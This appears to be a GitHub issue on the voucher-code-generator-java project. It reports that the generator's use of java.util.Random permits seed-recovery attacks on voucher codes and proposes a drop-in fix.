voucher-code-generator-java
voucher-code-generator-java copied to clipboard
voucherifyio
Voucher code generator uses insecure randomness to generate codes
The voucher code generator implementation uses an insecure source of randomness:
https://github.com/voucherifyio/voucher-code-generator-java/blob/master/src/main/java/io/voucherify/generator/VoucherCodes.java#L7
java.util.Random uses Knuth's linear congruence pseudorandom number generator. Practical seed recovery attacks on this generator are known: https://hal.archives-ouvertes.fr/hal-02700791/document
While this attack requires a long-running Java process to both issue a large number of codes AND a user to obtain (in sequential order) a set of these codes, this is a drop-in fix that resolves this issue.
See #2
